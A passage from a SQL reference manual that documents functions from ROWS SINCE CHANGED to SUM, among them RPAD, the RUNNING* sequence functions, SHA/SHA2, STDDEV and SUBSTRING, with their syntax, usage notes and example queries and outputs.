extension.\r\n\r\n```\r\nROWS SINCE CHANGED (column-expression-list)\r\n```\r\n\r\n* `_column-expression-list_`\r\n+\r\nis a comma-separated list that specifies a derived column list\r\ndetermined by the evaluation of the column expression list.\r\nROWS SINCE CHANGED returns the number of rows counted since the\r\nvalues of _column-expression-list_ changed.\r\n\r\n[[considerations_for_rows_since_changed]]\r\n=== Considerations for ROWS SINCE CHANGED\r\n\r\n[[counting_the_rows_since_changed]]\r\n==== Counting the Rows\r\n\r\nFor the first row in the intermediate result table, the count is 1. For\r\nsubsequent rows that have the same value for _column-expression-list_ as\r\nthe previous row, the count is 1 plus the count\r\nin the previous row. For subsequent rows that have a different value of\r\n_column-expression-list_\r\nthan the previous row, the count is 1.\r\n\r\n[[examples_of_rows_since_changed]]\r\n=== Examples of ROWS SINCE CHANGED\r\n\r\n* Return the number of rows since the value _i1_ last changed:\r\n+\r\n```\r\nSELECT ROWS SINCE CHANGED (i1)\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n```\r\n\r\n* Return the number of rows since the values _i1_ and _ts_ last changed:\r\n+\r\n```\r\nSELECT ROWS SINCE CHANGED (i1, ts)\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n```\r\n\r\n<<<\r\n[[rpad_function]]\r\n== RPAD Function\r\n\r\nThe RPAD function pads the right side of a string with the specified\r\nstring. Every character in the string, including multi-byte characters,\r\nis treated as one character.\r\n\r\nRPAD is a {project-name} SQL extension.\r\n\r\n```\r\nRPAD (str, len [, padstr])\r\n```\r\n\r\n* `_str_`\r\n+\r\ncan be an expression.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_len_`\r\n+\r\nidentifies the desired number of characters to be returned and can be an\r\nexpression but must be an integral value. If _len_ is equal to the\r\nlength of the string, no change is made.
If _len_ is smaller than the\r\nstring size, the string is truncated.\r\n\r\n* `_padstr_`\r\n+\r\nspecifies the string with which to pad and can be an expression. If you\r\nomit _padstr_, the string is padded with space characters.\r\n\r\n<<<\r\n[[examples_of_rpad_function]]\r\n=== Examples of RPAD\r\n\r\n* This function returns 'kite   ':\r\n+\r\n```\r\nRPAD('kite', 7)\r\n```\r\n\r\n* This function returns 'ki':\r\n+\r\n```\r\nRPAD('kite', 2)\r\n```\r\n\r\n* This function returns 'kite0000':\r\n+\r\n```\r\nRPAD('kite', 8, '0')\r\n```\r\n\r\n* This function returns 'go fly a kite':\r\n+\r\n```\r\nRPAD('go fly a kite', 13, 'z')\r\n```\r\n\r\n* This function returns 'go fly a kitez':\r\n+\r\n```\r\nRPAD('go fly a kite', 14, 'z')\r\n```\r\n\r\n* This function returns 'kitegoflygoflygof':\r\n+\r\n```\r\nRPAD('kite', 17, 'gofly' )\r\n```\r\n\r\n<<<\r\n[[rtrim_function]]\r\n== RTRIM Function\r\n\r\nThe RTRIM function removes trailing spaces from a character string. If\r\nyou must remove any trailing character other than space, use the TRIM\r\nfunction and specify the value of the character.\r\nSee the <<trim_function,TRIM Function>>.\r\n\r\nRTRIM is a {project-name} SQL extension.\r\n\r\n```\r\nRTRIM (character-expression)\r\n```\r\n\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression and specifies the string from which\r\nto trim trailing spaces.\r\n+\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_rtrim]]\r\n=== Considerations for RTRIM\r\n\r\n[[result_of_rtrim]]\r\n==== Result of RTRIM\r\n\r\nThe result is always of type VARCHAR, with maximum length equal to the\r\nfixed length or maximum variable length of _character-expression_.\r\n\r\n[[examples_of_rtrim]]\r\n=== Examples of RTRIM\r\n\r\n* Return ' Robert':\r\n+\r\n```\r\nRTRIM (' Robert ')\r\n```\r\n+\r\nSee <<trim_function,TRIM Function>> and <<ltrim_function,LTRIM Function>>.\r\n\r\n<<<\r\n[[runningavg_function]]\r\n== RUNNINGAVG Function\r\n\r\nThe RUNNINGAVG function is a sequence function that returns the average\r\nof non-null values of a column up to and including the current row of an\r\nintermediate result table ordered by a SEQUENCE BY clause in a SELECT\r\nstatement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGAVG is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGAVG (column-expression)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n+\r\nRUNNINGAVG returns the average of non-null values of _column-expression_\r\nup to and including the current row.\r\n\r\n[[considerations_for_runningavg]]\r\n=== Considerations for RUNNINGAVG\r\n\r\n[[equivalent_result]]\r\n==== Equivalent Result\r\n\r\nThe result of RUNNINGAVG is equivalent to:\r\n\r\n```\r\nRUNNINGSUM(column-expr) \/ RUNNINGCOUNT(*)\r\n```\r\n\r\n[[examples_of_runningavg]]\r\n=== Examples of RUNNINGAVG\r\n\r\n* Return the average of non-null values of _i1_ up to and including the\r\ncurrent row:\r\n+\r\n```\r\nSELECT RUNNINGAVG(i1) AS avg_i1\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\navg_i1\r\n--------------------\r\n 6215\r\n 17194\r\n 11463\r\n 9746\r\n 10190\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[runningcount_function]]\r\n== RUNNINGCOUNT Function\r\n\r\nThe RUNNINGCOUNT function is a sequence function that returns the number\r\nof rows up to and including the current row of an intermediate result\r\ntable ordered by a SEQUENCE BY clause in a SELECT statement.
See\r\n<<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGCOUNT is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGCOUNT {(*) | (column-expression)}\r\n```\r\n\r\n* `*`\r\n+\r\nas an argument causes RUNNINGCOUNT(*) to return the number of rows in\r\nthe intermediate result table up to and including the current row.\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. If _column-expression_ is the argument, RUNNINGCOUNT returns\r\nthe number of rows containing non-null values of _column-expression_ in the\r\nintermediate result table up to and including the current row.\r\n\r\n\r\n[[considerations_for_runningcount]]\r\n=== Considerations for RUNNINGCOUNT\r\n\r\n[[no_distinct_clause]]\r\n==== No DISTINCT Clause\r\n\r\nThe RUNNINGCOUNT sequence function is defined differently from the COUNT\r\naggregate function. If you specify DISTINCT for the COUNT aggregate\r\nfunction, duplicate values are eliminated before COUNT is applied. You\r\ncannot specify DISTINCT for the RUNNINGCOUNT sequence function;\r\nduplicate values are counted.\r\n\r\n<<<\r\n[[examples_of_runningcount]]\r\n=== Examples of RUNNINGCOUNT\r\n\r\n* Return the number of rows that include non-null values of _i1_ up to and\r\nincluding the current row:\r\n+\r\n```\r\nSELECT RUNNINGCOUNT (i1) AS count_i1\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\ncount_i1\r\n------------\r\n 1\r\n 2\r\n 2\r\n 3\r\n 4\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[runningmax_function]]\r\n== RUNNINGMAX Function\r\n\r\nThe RUNNINGMAX function is a sequence function that returns the maximum\r\nof values of a column up to and including the current row of an\r\nintermediate result table ordered by a SEQUENCE BY clause in a SELECT\r\nstatement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGMAX is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGMAX (column-expression)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n+\r\nRUNNINGMAX returns the maximum of values of _column-expression_ up to\r\nand including the current row.\r\n\r\n\r\n[[examples_of_runningmax]]\r\n=== Examples of RUNNINGMAX\r\n\r\n* Return the maximum of values of _i1_ up to and including the current row:\r\n+\r\n```\r\nSELECT RUNNINGMAX(i1) AS max_i1\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nmax_i1\r\n------------\r\n 6215\r\n 28174\r\n 28174\r\n 28174\r\n 28174\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[runningmin_function]]\r\n== RUNNINGMIN Function\r\n\r\nThe RUNNINGMIN function is a sequence function that returns the minimum\r\nof values of a column up to and including the current row of an\r\nintermediate result table ordered by a SEQUENCE BY clause in a SELECT\r\nstatement. 
See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGMIN is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGMIN (column-expression)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n+\r\nRUNNINGMIN returns the minimum of values of _column-expression_ up to\r\nand including the current row.\r\n\r\n[[examples_of_runningmin]]\r\n=== Examples of RUNNINGMIN\r\n\r\n* Return the minimum of values of _i1_ up to and including the current row:\r\n+\r\n```\r\nSELECT RUNNINGMIN(i1) AS min_i1\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nmin_i1\r\n------------\r\n 6215\r\n 6215\r\n 6215\r\n 4597\r\n 4597\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[runningstddev_function]]\r\n== RUNNINGSTDDEV Function\r\n\r\nThe RUNNINGSTDDEV function is a sequence function that returns the\r\nstandard deviation of non-null values of a column up to and including the\r\ncurrent row of an intermediate result table ordered by a SEQUENCE BY\r\nclause in a SELECT statement.\r\nSee <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGSTDDEV is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGSTDDEV (column-expression)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n+\r\nRUNNINGSTDDEV returns the standard deviation of non-null values of\r\n_column-expression_ up to and including the current row.\r\n\r\n[[considerations_for_runningstddev]]\r\n=== Considerations for RUNNINGSTDDEV\r\n\r\n[[equivalent_result_runningstddev]]\r\n==== Equivalent Result\r\n\r\nThe result of RUNNINGSTDDEV is equivalent to:\r\n\r\n```\r\nSQRT(RUNNINGVARIANCE(column-expression))\r\n```\r\n\r\n<<<\r\n[[examples_of_runningstddev]]\r\n=== Examples of RUNNINGSTDDEV\r\n\r\n* Return the standard deviation of non-null values of _i1_ up to and\r\nincluding the current row:\r\n+\r\n```\r\nSELECT RUNNINGSTDDEV (i1) AS stddev_i1\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nSTDDEV_I1\r\n-------------------------\r\n 0.00000000000000000E+000\r\n 1.55273578080753976E+004\r\n 1.48020166531456112E+004\r\n 1.25639147428923072E+004\r\n 1.09258501408357232E+004\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n* You can use the CAST function for display purposes. For example:\r\n+\r\n```\r\nSELECT CAST(RUNNINGSTDDEV(i1) AS DEC(18,3))\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\n(EXPR)\r\n--------------------\r\n .000\r\n 15527.357\r\n 14802.016\r\n 12563.914\r\n 10925.850\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[runningsum_function]]\r\n== RUNNINGSUM Function\r\n\r\nThe RUNNINGSUM function is a sequence function that returns the sum of\r\nnon-null values of a column up to and including the current row of an\r\nintermediate result table ordered by a SEQUENCE BY clause in a SELECT\r\nstatement.
See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGSUM is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGSUM (column-expression)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n+\r\nRUNNINGSUM returns the sum of non-null values of _column-expression_ up\r\nto and including the current row.\r\n\r\n[[examples_of_runningsum]]\r\n=== Examples of RUNNINGSUM\r\n\r\n* Return the sum of non-null values of _i1_ up to and including the current\r\nrow:\r\n+\r\n```\r\nSELECT RUNNINGSUM(i1) AS sum_i1\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nsum_i1\r\n--------------------\r\n 6215\r\n 34389\r\n 34389\r\n 38986\r\n 50952\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[runningvariance_function]]\r\n== RUNNINGVARIANCE Function\r\n\r\nThe RUNNINGVARIANCE function is a sequence function that returns the\r\nvariance of non-null values of a column up to and including the current\r\nrow of an intermediate result table ordered by a SEQUENCE BY clause in a\r\nSELECT statement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGVARIANCE is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGVARIANCE (column-expression)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n+\r\nRUNNINGVARIANCE returns the variance of non-null values of\r\n_column-expression_ up to and including the current row.\r\n\r\n[[examples_of_runningvariance]]\r\n=== Examples of RUNNINGVARIANCE\r\n\r\n* Return the variance of non-null values of _i1_ up to and including the\r\ncurrent row:\r\n+\r\n```\r\nSELECT RUNNINGVARIANCE(i1) AS variance_i1\r\nFROM mining.seqfcn SEQUENCE BY TS;\r\n\r\nvariance_i1\r\n-------------------------\r\n 0.00000000000000000E+000\r\n 2.41098840499999960E+008\r\n 2.19099696999999968E+008\r\n 1.57851953666666640E+008\r\n 1.19374201299999980E+008\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n* You can use the CAST function for display purposes. For example:\r\n+\r\n```\r\nSELECT CAST(RUNNINGVARIANCE (i1) AS DEC (18,3))\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\n(EXPR)\r\n--------------------\r\n .000\r\n 241098840.500\r\n 219099697.000\r\n 157851953.666\r\n 119374201.299\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[second_function]]\r\n== SECOND Function\r\n\r\nThe SECOND function converts a TIME or TIMESTAMP expression into an\r\nINTEGER value in the range 0 through 59 that represents the\r\ncorresponding second of the hour.\r\n\r\nSECOND is a {project-name} SQL extension.\r\n\r\n```\r\nSECOND (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type TIME or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_second]]\r\n=== Examples of SECOND\r\n\r\n* Return a numeric value that represents the second of the hour from the\r\n_ship_timestamp_ column:\r\n\r\n```\r\nSELECT start_date, ship_timestamp, SECOND(ship_timestamp)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- -----------\r\n2008-04-10 2008-04-21 08:15:00.000000 .000000\r\n```\r\n\r\n<<<\r\n[[sha_function]]\r\n== SHA Function\r\n\r\nCalculates an SHA-1 160-bit checksum for the string, as described in \r\nRFC 3174 (Secure Hash Algorithm). The value is returned as a string of \r\n40 hexadecimal digits, or NULL if the argument was NULL. 
\r\n\r\n[[examples_of_sha]]\r\n=== Examples of SHA\r\n```\r\n>>SELECT SHA1('abc') FROM dual;\r\n\r\n(EXPR)\r\n-----------------------------------------\r\n'a9993e364706816aba3e25717850c26c9cd0d89d'\r\n```\r\n\r\n<<<\r\n[[sha2_function]]\r\n== SHA2 Function\r\n\r\nCalculates the SHA-2 family of hash functions (SHA-224, SHA-256, SHA-384, \r\nand SHA-512). The first argument is the cleartext string to be hashed. \r\nThe second argument indicates the desired bit length of the result, which \r\nmust have a value of 224, 256, 384, or 512.\r\nIf either argument is NULL or the hash length is not one of the permitted values, \r\nthe return value is NULL. Otherwise, the function result is a hash value containing \r\nthe desired number of bits. See the notes at the beginning of this section \r\nabout storing hash values efficiently.\r\n\r\n[[examples_of_sha2]]\r\n=== Examples of SHA2\r\n```\r\n>>SELECT SHA2('abc', 224) FROM dual;\r\n\r\n(EXPR)\r\n--------------------------------------------------------\r\n'23097d223405d8228642a477bda255b32aadbce4bda0b3f7e36c9da7'\r\n```\r\n<<<\r\n[[sign_function]]\r\n== SIGN Function\r\n\r\nThe SIGN function returns an indicator of the sign of a numeric value\r\nexpression. If the value is less than zero, the function returns -1 as\r\nthe indicator. If the value is zero, the function returns 0. If the\r\nvalue is greater than zero, the function returns 1.\r\n\r\nSIGN is a {project-name} SQL extension.\r\n\r\n```\r\nSIGN (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the SIGN function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_sign]]\r\n=== Examples of SIGN\r\n\r\n* Return the value -1:\r\n+\r\n```\r\nSIGN(-20 + 12)\r\n```\r\n\r\n* Return the value 0:\r\n+\r\n```\r\nSIGN(-20 + 20)\r\n```\r\n\r\n* Return the value 1:\r\n+\r\n```\r\nSIGN(-20 + 22)\r\n```\r\n\r\n<<<\r\n[[sin_function]]\r\n== SIN Function\r\n\r\nThe SIN function returns the sine of a numeric value expression, where\r\nthe expression is an angle expressed in radians.\r\n\r\nSIN is a {project-name} SQL extension.\r\n\r\n```\r\nSIN (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the SIN function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_sin]]\r\n=== Examples of SIN\r\n\r\n* This function returns the value 3.42052233254419840E-001, or\r\napproximately 0.3420, the sine of 0.3491 (which is 20 degrees):\r\n+\r\n```\r\nSIN (0.3491)\r\n```\r\n\r\n<<<\r\n[[sinh_function]]\r\n== SINH Function\r\n\r\nThe SINH function returns the hyperbolic sine of a numeric value\r\nexpression, where the expression is an angle expressed in radians.\r\n\r\nSINH is a {project-name} SQL extension.\r\n\r\n```\r\nSINH (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the SINH function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_sinh]]\r\n=== Examples of SINH\r\n\r\n* This function returns the value 1.60191908030082560E+000, or\r\napproximately 1.6019, the hyperbolic sine of 1.25:\r\n+\r\n```\r\nSINH (1.25)\r\n```\r\n\r\n<<<\r\n[[space_function]]\r\n== SPACE Function\r\n\r\nThe SPACE function returns a character string consisting of a specified\r\nnumber of spaces, each of which is 0x20 or 0x0020, depending on
the\r\nchosen character set.\r\n\r\nSPACE is a {project-name} SQL extension.\r\n\r\n```\r\nSPACE (length [, char-set-name])\r\n```\r\n\r\n* `_length_`\r\n+\r\nspecifies the number of characters to be returned. The number _length_\r\nmust be a value greater than or equal to zero of exact numeric data type\r\nand with a scale of zero. _length_ cannot exceed 32768 for the ISO88591\r\nor UTF8 character sets.\r\n\r\n* `_char-set-name_`\r\n+\r\ncan be ISO88591 or UTF8. If you do not specify this second argument, the\r\ndefault is the default character set.\r\n+\r\nThe returned character string will be of data type VARCHAR associated\r\nwith the character set specified by _char-set-name_.\r\n\r\n[[examples_of_space]]\r\n=== Examples of SPACE\r\n\r\n* Return three spaces:\r\n+\r\n```\r\nSPACE(3)\r\n```\r\n\r\n<<<\r\n[[sqrt_function]]\r\n== SQRT Function\r\n\r\nThe SQRT function returns the square root of a numeric value expression.\r\n\r\nSQRT is a {project-name} SQL extension.\r\n\r\n```\r\nSQRT (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the SQRT function. The value of the argument must not be a\r\nnegative number. See <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_sqrt]]\r\n=== Examples of SQRT\r\n\r\n* This function returns the value 5.19615242270663232E+000, or\r\napproximately 5.196:\r\n+\r\n```\r\nSQRT(27)\r\n```\r\n\r\n<<<\r\n[[stddev_function]]\r\n== STDDEV Function\r\n\r\nSTDDEV is an aggregate function that returns the standard deviation of a\r\nset of numbers. STDDEV is a {project-name} SQL extension.\r\n\r\n```\r\nSTDDEV ([ALL | DISTINCT] expression [, weight])\r\n```\r\n\r\n* `ALL | DISTINCT`\r\n+\r\nspecifies whether duplicate values are included in the computation of\r\nthe STDDEV of the _expression_. The default option is ALL, which\r\ncauses duplicate values to be included. If you specify DISTINCT,\r\nduplicate values are eliminated before the STDDEV function is applied.\r\nIf DISTINCT is specified, you cannot specify _weight_.\r\n\r\n* `_expression_`\r\n+\r\nspecifies a numeric value expression that determines the values for\r\nwhich to compute the standard deviation. The _expression_ cannot contain\r\nan aggregate function or a subquery. The DISTINCT clause specifies that\r\nthe STDDEV function operates on distinct values from the one-column\r\ntable derived from the evaluation of _expression_.\r\n\r\n* `_weight_`\r\n+\r\nspecifies a numeric value expression that determines the weights of the\r\nvalues for which to compute the standard deviation. _weight_ cannot\r\ncontain an aggregate function or a subquery. _weight_ is defined on\r\nthe same table as _expression_.
The one-column table derived from the\r\nevaluation of _expression_ and the one-column table derived from the\r\nevaluation of _weight_ must have the same cardinality.\r\n\r\n[[considerations_for_stddev]]\r\n=== Considerations for STDDEV\r\n\r\n[[definition_of_stddev]]\r\n==== Definition of STDDEV\r\n\r\nThe standard deviation of a value expression is defined to be the square\r\nroot of the variance of the expression.\r\nSee <<variance_function,VARIANCE Function>>.\r\n\r\nBecause the definition of variance has _N-1_ in the denominator of the\r\nexpression (if weight is not specified), {project-name} SQL returns a\r\nsystem-defined default setting of zero (and no error) if the number of\r\nrows in the table, or a group of the table, is equal to 1.\r\n\r\n[[data_type_of_the_result_stddev]]\r\n==== Data Type of the Result\r\n\r\nThe data type of the result is always DOUBLE PRECISION.\r\n\r\n[[operands_of_the_expression_stddev]]\r\n==== Operands of the Expression\r\n\r\nThe expression includes columns from the rows of the SELECT result table\r\nbut cannot include an aggregate function. These are valid:\r\n\r\n```\r\nSTDDEV (SALARY)\r\nSTDDEV (SALARY * 1.1)\r\nSTDDEV (PARTCOST * QTY_ORDERED)\r\n```\r\n\r\n[[stddev_nulls]]\r\n==== Nulls\r\n\r\nSTDDEV is evaluated after eliminating all nulls from the set. If the\r\nresult table is empty, STDDEV returns NULL.\r\n\r\n[[float54_and_double_precision_data_stddev]]\r\n==== FLOAT(54) and DOUBLE PRECISION Data\r\n\r\nAvoid using large FLOAT(54) or DOUBLE PRECISION values as arguments to\r\nSTDDEV. If SUM(x * x) exceeds the value of 1.15792089237316192e77 during the computation\r\nof STDDEV(x), a numeric overflow occurs.\r\n\r\n<<<\r\n[[examples_of_stddev]]\r\n=== Examples of STDDEV\r\n\r\n* Compute the standard deviation of the salary of the current employees:\r\n+\r\n```\r\nSELECT STDDEV(salary) AS StdDev_Salary FROM persnl.employee;\r\n\r\nSTDDEV_SALARY\r\n-------------------------\r\n 3.57174062500000000E+004\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* Compute the standard deviation of the cost of parts in the current\r\ninventory:\r\n+\r\n```\r\nSELECT STDDEV (price * qty_available) FROM sales.parts;\r\n\r\n(EXPR)\r\n-------------------------\r\n 7.13899499999999808E+006\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[substring_function]]\r\n== SUBSTRING\/SUBSTR Function\r\n\r\nThe SUBSTRING function extracts a substring out of a given character\r\nexpression. It returns a character string of data type VARCHAR, with a\r\nmaximum length equal to the smaller of these two:\r\n\r\n\r\n* The fixed length of the input string (for CHAR-type strings) or the\r\nmaximum variable length (for VARCHAR-type strings)\r\n* The value of the length argument (when a constant is specified) or\r\n32708 (when a non-constant is specified)\r\n\r\nSUBSTR is equivalent to SUBSTRING.\r\n\r\n```\r\nSUBSTRING (character-expr FROM start-position [FOR length])\r\n```\r\n\r\nor:\r\n\r\n```\r\nSUBSTRING (character-expr, start-position [, length])\r\n```\r\n\r\n* `_character-expr_`\r\n+\r\nspecifies the source string from which to extract the substring. The\r\nsource string is an SQL character value expression. The operand is the\r\nresult of evaluating _character-expr_. See\r\n<<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_start-position_`\r\n+\r\nspecifies the starting position _start-position_ within _character-expr_\r\nat which to start extracting the substring.
_start-position_ must be a\r\nvalue with an exact numeric data type and a scale of zero.\r\n\r\n* `_length_`\r\n+\r\nspecifies the number of characters to extract from _character-expr_.\r\nKeep in mind that every character, including multi-byte characters,\r\ncounts as one character. _length_ is the length of the extracted\r\nsubstring and must be a value greater than or equal to zero of exact\r\nnumeric data type and with a scale of zero. The _length_ field is\r\noptional. If you do not specify it, all characters starting at\r\n_start-position_ and continuing until the end of _character-expr_ are\r\nreturned.\r\n\r\n[[alternative_forms]]\r\n=== Alternative Forms\r\n\r\n* The SUBSTRING function treats SUBSTRING( _string_ FOR _int_ ) as\r\nequivalent to SUBSTRING( _string_ FROM 1 FOR _int_ ). The {project-name}\r\ndatabase software already supports the ANSI standard form:\r\n+\r\n```\r\nSUBSTRING(string FROM int [ FOR int ])\r\n```\r\n\r\n* The SUBSTRING function treats SUBSTRING (_string_, _Fromint_) as\r\nequivalent to SUBSTRING(_string_ FROM _Fromint_). The {project-name}\r\ndatabase software already supports SUBSTRING (_string_, _Fromint_,\r\n_Forint_) as equivalent to the ANSI standard form:\r\n+\r\n```\r\nSUBSTRING(string FROM Fromint FOR Forint)\r\n```\r\n\r\n[[considerations_for_substring]]\r\n=== Considerations for SUBSTRING\/SUBSTR\r\n\r\n[[requirements_for_the_expression_length_and_start_position]]\r\n==== Requirements for the Expression, Length, and Start Position\r\n\r\n* The data types of the substring length and the start position must be\r\nnumeric with a scale of zero. Otherwise, an error is returned.\r\n* If the sum of the start position and the substring length is greater\r\nthan the length of the character expression, the substring from the\r\nstart position to the end of the string is returned.\r\n* If the start position is greater than the length of the character\r\nexpression, an empty string ('') is returned.\r\n* The resulting substring is always of type VARCHAR.
If the source\r\ncharacter string is an up-shifted CHAR or VARCHAR string, the result is\r\nan up-shifted VARCHAR type.\r\n\r\n<<<\r\n[[examples_of_substring]]\r\n=== Examples of SUBSTRING\/SUBSTR\r\n\r\n* Extract 'Ro':\r\n+\r\n```\r\nSUBSTRING('Robert John Smith' FROM 0 FOR 3)\r\nSUBSTR('Robert John Smith' FROM 0 FOR 3)\r\n```\r\n\r\n* Extract 'John':\r\n+\r\n```\r\nSUBSTRING ('Robert John Smith' FROM 8 FOR 4)\r\nSUBSTR ('Robert John Smith' FROM 8 FOR 4)\r\n```\r\n\r\n* Extract 'John Smith':\r\n+\r\n```\r\nSUBSTRING ('Robert John Smith' FROM 8)\r\nSUBSTR ('Robert John Smith' FROM 8)\r\n```\r\n\r\n* Extract 'Robert John Smith':\r\n+\r\n```\r\nSUBSTRING ('Robert John Smith' FROM 1 FOR 17)\r\nSUBSTR ('Robert John Smith' FROM 1 FOR 17)\r\n```\r\n\r\n* Extract 'John Smith':\r\n+\r\n```\r\nSUBSTRING ('Robert John Smith' FROM 8 FOR 15)\r\nSUBSTR ('Robert John Smith' FROM 8 FOR 15)\r\n```\r\n\r\n* Extract 'Ro':\r\n+\r\n```\r\nSUBSTRING ('Robert John Smith' FROM -2 FOR 5)\r\nSUBSTR ('Robert John Smith' FROM -2 FOR 5)\r\n```\r\n\r\n* Extract an empty string '':\r\n+\r\n```\r\nSUBSTRING ('Robert John Smith' FROM 8 FOR 0)\r\nSUBSTR ('Robert John Smith' FROM 8 FOR 0)\r\n```\r\n\r\n<<<\r\n[[sum_function]]\r\n== SUM Function\r\n\r\nSUM is an aggregate function that returns the sum of a set of numbers.\r\n\r\n```\r\nSUM ([ALL | DISTINCT] expression)\r\n```\r\n\r\n* `ALL | DISTINCT`\r\n+\r\nspecifies whether duplicate values are included in the computation of\r\nthe SUM of the _expression_. The default option is ALL, which causes\r\nduplicate values to be included. If you specify DISTINCT, duplicate\r\nvalues are eliminated before the SUM function is applied.\r\n\r\n* `_expression_`\r\n+\r\nspecifies a numeric or interval value expression that determines the\r\nvalues to sum. The _expression_ cannot contain an aggregate function or\r\na subquery. The DISTINCT clause specifies that the SUM function operates\r\non distinct values from the one-column table derived from the evaluation\r\nof _expression_. All nulls are eliminated before the function is\r\napplied to the set of values. If the result table is empty, SUM returns\r\nNULL. See <<expressions,Expressions>>.\r\n\r\n[[considerations_for_sum]]\r\n=== Considerations for SUM\r\n\r\n[[data_type_and_scale_of_the_result]]\r\n==== Data Type and Scale of the Result\r\n\r\nThe data type of the result depends on the data type of the argument. If\r\nthe argument is an exact numeric type, the result is LARGEINT. If the\r\nargument is an approximate numeric type, the result\r\nis DOUBLE PRECISION. If the argument is INTERVAL data type, the result\r\nis INTERVAL with the same precision as the argument. The scale of the\r\nresult is the same as the scale of the argument. If the argument has no\r\nscale, the result is truncated.\r\n\r\n[[operands_of_the_expression]]\r\n==== Operands of the Expression\r\n\r\nThe expression includes columns from the rows of the SELECT result\r\ntable — but cannot include an aggregate function. 
